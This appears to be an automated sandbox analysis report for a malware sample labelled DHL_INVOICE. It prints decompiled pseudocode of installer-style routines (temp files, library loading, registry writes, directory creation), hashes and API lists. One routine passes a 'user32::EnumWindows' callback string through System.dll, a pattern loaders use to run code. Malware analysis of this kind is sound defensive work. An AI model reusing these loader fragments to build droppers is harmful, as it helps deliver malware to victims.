                                                                            • Opcode Fuzzy Hash: f1f7e37c5f37630b72f6845fbd57869b2fc528f3cdafd86d5b2e789551c5bd10
                                                                            • Instruction Fuzzy Hash: 93F0BB7160022467DB10A764DC0DB9A36ACEB00304F50447AA906F61C2E77CDE54C79C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1057 406a56-406a62 1058 406a63-406a95 GetTickCount GetTempFileNameW 1057->1058 1059 406aa0 1058->1059 1060 406a97-406a99 1058->1060 1061 406aa2-406aa5 1059->1061 1060->1058 1062 406a9b-406a9e 1060->1062 1062->1061
                                                                            C-Code - Quality: 100%
                                                                            			E00406A56(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                            				intOrPtr _v8;
                                                                            				short _v12;
                                                                            				signed int _t12;
                                                                            				WCHAR* _t15;
                                                                            				signed int _t17;
                                                                            				void* _t21;
                                                                            				WCHAR* _t24;
                                                                            
                                                                            				_t24 = _a4;
                                                                            				_t21 = 0x64;
                                                                            				while(1) {
                                                                            					_t21 = _t21 - 1;
                                                                            					_v12 = 0x73006e;
                                                                            					_v8 = 0x61;
                                                                            					_t12 = GetTickCount();
                                                                            					_t17 = 0x1a;
                                                                            					_v8 = _v8 + _t12 % _t17;
                                                                            					_t15 = GetTempFileNameW(_a8,  &_v12, 0, _t24); // executed
                                                                            					if(_t15 != 0) {
                                                                            						break;
                                                                            					}
                                                                            					if(_t21 != 0) {
                                                                            						continue;
                                                                            					} else {
                                                                            						 *_t24 = _t15;
                                                                            					}
                                                                            					L5:
                                                                            					return _t15;
                                                                            				}
                                                                            				_t15 = _t24;
                                                                            				goto L5;
                                                                            			}










                                                                            0x00406a5c
                                                                            0x00406a62
                                                                            0x00406a63
                                                                            0x00406a63
                                                                            0x00406a64
                                                                            0x00406a6b
                                                                            0x00406a72
                                                                            0x00406a7a
                                                                            0x00406a80
                                                                            0x00406a8d
                                                                            0x00406a95
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406a99
                                                                            0x00000000
                                                                            0x00406a9b
                                                                            0x00406a9b
                                                                            0x00406a9b
                                                                            0x00406aa2
                                                                            0x00406aa5
                                                                            0x00406aa5
                                                                            0x00406aa0
                                                                            0x00000000

                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00406A72
                                                                            • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CD4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00406A8D
                                                                            Strings
                                                                            • n, xrefs: 00406A64
                                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A5F
                                                                            • a, xrefs: 00406A6B
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00406A5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                            • API String ID: 1716503409-3027303449
                                                                            • Opcode ID: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
                                                                            • Instruction ID: ceede72bcc8b9f9399702d6205d38d242a1142e8e26f45c6d668c419d088e7be
                                                                            • Opcode Fuzzy Hash: 9de58611c99d9c927524e8b5e5d4063ad7aa9c56d54475759094ed59cc3f2f7a
                                                                            • Instruction Fuzzy Hash: E9F05E72700208BBEB149F55DC09BDE7779EF91B14F14803BEA41BA180E3F45E5487A4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1063 40225d-402268 1064 40233e-402343 1063->1064 1065 40226e-402289 call 40303e * 2 1063->1065 1066 402345-40234a call 405d3a 1064->1066 1075 40228b-402296 GetModuleHandleW 1065->1075 1076 40229c-4022aa LoadLibraryExW 1065->1076 1072 402ea5-402eb7 1066->1072 1078 4022b0-4022c2 call 406269 1075->1078 1080 402298 1075->1080 1076->1078 1079 402335-40233c 1076->1079 1083 4022c4-4022ca 1078->1083 1084 402306-40230c call 405d3a 1078->1084 1079->1066 1080->1076 1085 4022e6-402304 1083->1085 1086 4022cc-4022e0 call 405d3a 1083->1086 1088 402311-402315 1084->1088 1085->1088 1086->1088 1097 4022e2-4022e4 1086->1097 1088->1072 1090 40231b-402323 call 403cd6 1088->1090 1090->1072 1096 402329-402330 FreeLibrary 1090->1096 1096->1072 1097->1088
                                                                            C-Code - Quality: 54%
                                                                            			E0040225D(void* __ebp, void* _a4, void* _a8, intOrPtr _a12, intOrPtr* _a16, WCHAR* _a20, void* _a28, intOrPtr _a32, signed int _a48) {
                                                                            				void* _v0;
                                                                            				struct HINSTANCE__* _t17;
                                                                            				struct HINSTANCE__* _t26;
                                                                            				void* _t27;
                                                                            				intOrPtr* _t29;
                                                                            				void* _t30;
                                                                            				WCHAR* _t32;
                                                                            				struct HINSTANCE__* _t33;
                                                                            				void* _t37;
                                                                            				void* _t39;
                                                                            
                                                                            				_t37 = __ebp;
                                                                            				_t27 = 1;
                                                                            				if( *0x435a60 < __ebp) {
                                                                            					_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            					_push(0xffffffe7);
                                                                            					L16:
                                                                            					E00405D3A();
                                                                            					L17:
                                                                            					 *0x435ac8 =  *0x435ac8 + _t27;
                                                                            					return 0;
                                                                            				}
                                                                            				_t32 = E0040303E(_t30, 0xfffffff0);
                                                                            				_a20 = _t32;
                                                                            				_a12 = E0040303E(_t30, 1);
                                                                            				if(_a48 == __ebp) {
                                                                            					L4:
                                                                            					_t17 = LoadLibraryExW(_t32, _t37, 8); // executed
                                                                            					_t33 = _t17;
                                                                            					_t44 = _t33;
                                                                            					if(_t33 == 0) {
                                                                            						_push("C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            						_push(0xfffffff6);
                                                                            						goto L16;
                                                                            					}
                                                                            					L5:
                                                                            					_t29 = E00406269(_t44, _t33, _a20);
                                                                            					_a16 = _t29;
                                                                            					if(_t29 == 0) {
                                                                            						E00405D3A(0xfffffff7, _a20);
                                                                            					} else {
                                                                            						_t27 = _t37;
                                                                            						if(_a48 == _t27) {
                                                                            							 *_t29(_a32, 0x400, L"user32::EnumWindows(i r1 ,i 0)", 0x40b100, 0x40b000);
                                                                            							_t39 = _t39 + 0x14;
                                                                            						} else {
                                                                            							E00405D3A(_a48, "C:\Users\Arthur\AppData\Local\Temp\nsaE104.tmp\System.dll");
                                                                            							if(_a16() != 0) {
                                                                            								_t27 = 1;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t39 + 0x34)) == _t37 && E00403CD6(_t33) != 0) {
                                                                            						FreeLibrary(_t33);
                                                                            					}
                                                                            					goto L17;
                                                                            				}
                                                                            				_t26 = GetModuleHandleW(_t32); // executed
                                                                            				_t33 = _t26;
                                                                            				if(_t33 != 0) {
                                                                            					goto L5;
                                                                            				}
                                                                            				_t32 =  *(_t39 + 0x18);
                                                                            				goto L4;
                                                                            			}













                                                                            0x0040225d
                                                                            0x00402260
                                                                            0x00402268
                                                                            0x0040233e
                                                                            0x00402343
                                                                            0x00402345
                                                                            0x00402345
                                                                            0x00402ea5
                                                                            0x00402ea5
                                                                            0x00402eb7
                                                                            0x00402eb7
                                                                            0x00402275
                                                                            0x00402278
                                                                            0x00402281
                                                                            0x00402289
                                                                            0x0040229c
                                                                            0x004022a0
                                                                            0x004022a6
                                                                            0x004022a8
                                                                            0x004022aa
                                                                            0x00402335
                                                                            0x0040233a
                                                                            0x00000000
                                                                            0x0040233a
                                                                            0x004022b0
                                                                            0x004022ba
                                                                            0x004022bc
                                                                            0x004022c2
                                                                            0x0040230c
                                                                            0x004022c4
                                                                            0x004022c4
                                                                            0x004022ca
                                                                            0x004022ff
                                                                            0x00402301
                                                                            0x004022cc
                                                                            0x004022d5
                                                                            0x004022e0
                                                                            0x004022e2
                                                                            0x004022e2
                                                                            0x004022e0
                                                                            0x004022ca
                                                                            0x00402315
                                                                            0x0040232a
                                                                            0x0040232a
                                                                            0x00000000
                                                                            0x00402315
                                                                            0x0040228c
                                                                            0x00402292
                                                                            0x00402296
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00402298
                                                                            0x00000000

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040228C
                                                                              • Part of subcall function 00405D3A: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D6C
                                                                              • Part of subcall function 00405D3A: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?,00000000,?,?), ref: 00405D7E
                                                                              • Part of subcall function 00405D3A: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,?), ref: 00405D99
                                                                              • Part of subcall function 00405D3A: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll), ref: 00405DB1
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?), ref: 00405DD8
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                                                              • Part of subcall function 00405D3A: SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004022A0
                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040232A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsaE104.tmp\System.dll$user32::EnumWindows(i r1 ,i 0)
                                                                            • API String ID: 334405425-3888751726
                                                                            • Opcode ID: 5d9898d65b13684158c7c887a5d08f6c9bc0d99037dba9cc0df1bb948ee2ac44
                                                                            • Instruction ID: aa6b704e5079027a8c34e107c1f377ebbd1d9565507d54c53cf3a7cdcd1ba86e
                                                                            • Opcode Fuzzy Hash: 5d9898d65b13684158c7c887a5d08f6c9bc0d99037dba9cc0df1bb948ee2ac44
                                                                            • Instruction Fuzzy Hash: C3210632648701ABD710AF618E8DA3F76A4ABD8721F20013FF941B12D1DBBC9801979F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1098 402656-4026a8 call 40303e * 2 call 403023 call 4062a5 1107 402ea5-402eb7 1098->1107 1108 4026ae-4026b9 1098->1108 1110 4026d1-4026d6 1108->1110 1111 4026bb-4026cf call 40303e lstrlenW 1108->1111 1114 4026e7-4026ec 1110->1114 1115 4026d8-4026e5 call 403002 1110->1115 1117 402700-402723 RegSetValueExW RegCloseKey 1111->1117 1114->1117 1118 4026ee-4026fe call 403148 1114->1118 1115->1117 1117->1107 1118->1117
                                                                            C-Code - Quality: 95%
                                                                            			E00402656(int _a20, intOrPtr _a24, intOrPtr _a40, intOrPtr _a52, intOrPtr _a56, char _a60, intOrPtr _a72) {
                                                                            				void* _v0;
                                                                            				void* _v4;
                                                                            				void* _v8;
                                                                            				void* _t20;
                                                                            				intOrPtr _t24;
                                                                            				signed int _t25;
                                                                            				signed int _t32;
                                                                            				void* _t37;
                                                                            				intOrPtr _t39;
                                                                            				int _t45;
                                                                            				void* _t46;
                                                                            				int _t47;
                                                                            				void* _t49;
                                                                            				void* _t51;
                                                                            
                                                                            				_a24 = _a56;
                                                                            				_a20 = _a60;
                                                                            				_a24 = E0040303E(_t37, 2);
                                                                            				_t20 = E0040303E(_t37, 0x11);
                                                                            				_t32 = 1;
                                                                            				E004062A5(_t51, E00403023(_a72), _t20, 0x100022,  &_a60); // executed
                                                                            				_t39 =  !=  ? 0 : _a40;
                                                                            				_a52 = _t39;
                                                                            				if(_t39 != 0) {
                                                                            					_t24 = _a24;
                                                                            					if(_t24 != 1) {
                                                                            						_t45 = 4;
                                                                            						__eflags = _t24 - 1;
                                                                            						if(_t24 != 1) {
                                                                            							_t45 = _t47;
                                                                            							__eflags = _t24 - 3;
                                                                            							if(_t24 == 3) {
                                                                            								_t45 = E00403148(_a52, _t47, 0x40c108, 0x1800);
                                                                            							}
                                                                            						} else {
                                                                            							 *0x40c108 = E00403002(3);
                                                                            						}
                                                                            					} else {
                                                                            						E0040303E(_t37, 0x23);
                                                                            						_t45 = 2 + lstrlenW(0x40c108) * 2;
                                                                            					}
                                                                            					_t46 =  *(_t49 + 0x54);
                                                                            					_t25 = RegSetValueExW(_t46,  *(_t49 + 0x2c), _t47, _a20, 0x40c108, _t45); // executed
                                                                            					asm("sbb eax, eax");
                                                                            					_t32 = _t32 &  ~_t25;
                                                                            					RegCloseKey(_t46); // executed
                                                                            				}
                                                                            				 *0x435ac8 =  *0x435ac8 + _t32;
                                                                            				return 0;
                                                                            			}

















                                                                            0x0040265a
                                                                            0x00402664
                                                                            0x0040266f
                                                                            0x00402673
                                                                            0x0040268a
                                                                            0x00402692
                                                                            0x0040269f
                                                                            0x004026a2
                                                                            0x004026a8
                                                                            0x004026ae
                                                                            0x004026b9
                                                                            0x004026d3
                                                                            0x004026d4
                                                                            0x004026d6
                                                                            0x004026e7
                                                                            0x004026e9
                                                                            0x004026ec
                                                                            0x004026fe
                                                                            0x004026fe
                                                                            0x004026d8
                                                                            0x004026e0
                                                                            0x004026e0
                                                                            0x004026bb
                                                                            0x004026bd
                                                                            0x004026c8
                                                                            0x004026c8
                                                                            0x00402701
                                                                            0x00402710
                                                                            0x00402718
                                                                            0x0040271a
                                                                            0x0040271d
                                                                            0x0040271d
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsaE104.tmp,00000023,?,00000011,00000002), ref: 004026C3
                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsaE104.tmp,?,?,00000011,00000002), ref: 00402710
                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsaE104.tmp,?,?,00000011,00000002), ref: 0040271D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValuelstrlen
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsaE104.tmp
                                                                            • API String ID: 2655323295-241883836
                                                                            • Opcode ID: 3e07514d90428e6a88bb3508a2036233d11feb277dc401e629d577e54deb66e6
                                                                            • Instruction ID: b85799c5b09c0d4e5107b9a6a50aeda658419008c73e2f9c6ba38a7de01b1a8e
                                                                            • Opcode Fuzzy Hash: 3e07514d90428e6a88bb3508a2036233d11feb277dc401e629d577e54deb66e6
                                                                            • Instruction Fuzzy Hash: CF21D072608311ABD711AFA5CC85B2FBBE8EB98760F10093EF541F71C1C7B99901879A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1124 4068e6-4068fc GetModuleHandleA 1125 406908-406910 GetProcAddress 1124->1125 1126 4068fe-4068ff call 40619e 1124->1126 1128 406916-406918 1125->1128 1129 406904-406906 1126->1129 1129->1125 1129->1128
                                                                            C-Code - Quality: 100%
                                                                            			E004068E6(signed int _a4) {
                                                                            				struct HINSTANCE__* _t6;
                                                                            				signed int _t8;
                                                                            
                                                                            				_t8 = _a4;
                                                                            				_t9 =  *(0x40b030 + _t8 * 8);
                                                                            				_t6 = GetModuleHandleA( *(0x40b030 + _t8 * 8));
                                                                            				if(_t6 != 0) {
                                                                            					L2:
                                                                            					return GetProcAddress(_t6,  *(0x40b034 + _t8 * 8));
                                                                            				}
                                                                            				_t6 = E0040619E(_t9); // executed
                                                                            				if(_t6 != 0) {
                                                                            					goto L2;
                                                                            				}
                                                                            				return _t6;
                                                                            			}





                                                                            0x004068e8
                                                                            0x004068ec
                                                                            0x004068f4
                                                                            0x004068fc
                                                                            0x00406908
                                                                            0x00000000
                                                                            0x00406910
                                                                            0x004068ff
                                                                            0x00406906
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406918

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406910
                                                                              • Part of subcall function 0040619E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004061B5
                                                                              • Part of subcall function 0040619E: wsprintfW.USER32 ref: 004061F1
                                                                              • Part of subcall function 0040619E: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406205
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                            • API String ID: 2547128583-890815371
                                                                            • Opcode ID: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
                                                                            • Instruction ID: 085141bfa328d30a19c357711f10e0b2ef6edf17adcd8b925e9f05de384a5053
                                                                            • Opcode Fuzzy Hash: 08f22430275ebaf4ce71005d419f066f02b7a6b81224d03b75b5b8ff4b37f54b
                                                                            • Instruction Fuzzy Hash: 00D02B316012159BDB001F22AE0C94F771DEEA67907020032F501F6231E334DC21C5FC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405E3E(WCHAR* _a4) {
                                                                            				struct _SECURITY_ATTRIBUTES _v16;
                                                                            				struct _SECURITY_DESCRIPTOR _v36;
                                                                            				short _t17;
                                                                            				int _t21;
                                                                            				long _t23;
                                                                            
                                                                            				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                            				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                            				_t17 = 4;
                                                                            				_v36.Control = _t17;
                                                                            				_v36.Owner = 0x409760;
                                                                            				_v36.Group = 0x409760;
                                                                            				_v16.lpSecurityDescriptor =  &_v36;
                                                                            				_v36.Revision = 1;
                                                                            				_v36.Dacl = 0x409750;
                                                                            				_v16.nLength = 0xc;
                                                                            				_t21 = CreateDirectoryW(_a4,  &_v16); // executed
                                                                            				if(_t21 != 0) {
                                                                            					L3:
                                                                            					return 0;
                                                                            				}
                                                                            				_t23 = GetLastError();
                                                                            				if(_t23 == 0xb7) {
                                                                            					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) == 0) {
                                                                            						return GetLastError();
                                                                            					}
                                                                            					goto L3;
                                                                            				}
                                                                            				return _t23;
                                                                            			}








                                                                            0x00405e44
                                                                            0x00405e48
                                                                            0x00405e4e
                                                                            0x00405e4f
                                                                            0x00405e58
                                                                            0x00405e5b
                                                                            0x00405e61
                                                                            0x00405e6b
                                                                            0x00405e71
                                                                            0x00405e78
                                                                            0x00405e7f
                                                                            0x00405e87
                                                                            0x00405eac
                                                                            0x00000000
                                                                            0x00405eac
                                                                            0x00405e89
                                                                            0x00405e94
                                                                            0x00405eaa
                                                                            0x00000000
                                                                            0x00405eb0
                                                                            0x00000000
                                                                            0x00405eaa
                                                                            0x00405eb7

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(00000000,?), ref: 00405E7F
                                                                            • GetLastError.KERNEL32 ref: 00405E89
                                                                            • SetFileSecurityW.ADVAPI32(00000000,80000007,00000001), ref: 00405EA2
                                                                            • GetLastError.KERNEL32 ref: 00405EB0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                            • String ID:
                                                                            • API String ID: 3449924974-0
                                                                            • Opcode ID: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
                                                                            • Instruction ID: 6ae0cafa5f15e980fc825a914f3c6ead540d2f1400f747b3271702dfe1e84024
                                                                            • Opcode Fuzzy Hash: 03bab9027c0db145622c505044cc12d7385c4ed912075bcffeefb87771bfe4ea
                                                                            • Instruction Fuzzy Hash: 3F01D675D00209EBEB009FA0D948BEFBBB9EB14315F104526E949F2291E7789A44CF99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405E1E(WCHAR* _a4) {
                                                                            				int _t2;
                                                                            				long _t5;
                                                                            
                                                                            				_t5 = 0;
                                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                            				if(_t2 == 0) {
                                                                            					_t5 = GetLastError();
                                                                            				}
                                                                            				return _t5;
                                                                            			}





                                                                            0x00405e1f
                                                                            0x00405e26
                                                                            0x00405e2e
                                                                            0x00405e36
                                                                            0x00405e36
                                                                            0x00405e3b

                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CC9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,761B3420,004039C2), ref: 00405E26
                                                                            • GetLastError.KERNEL32 ref: 00405E30
                                                                            Strings
                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
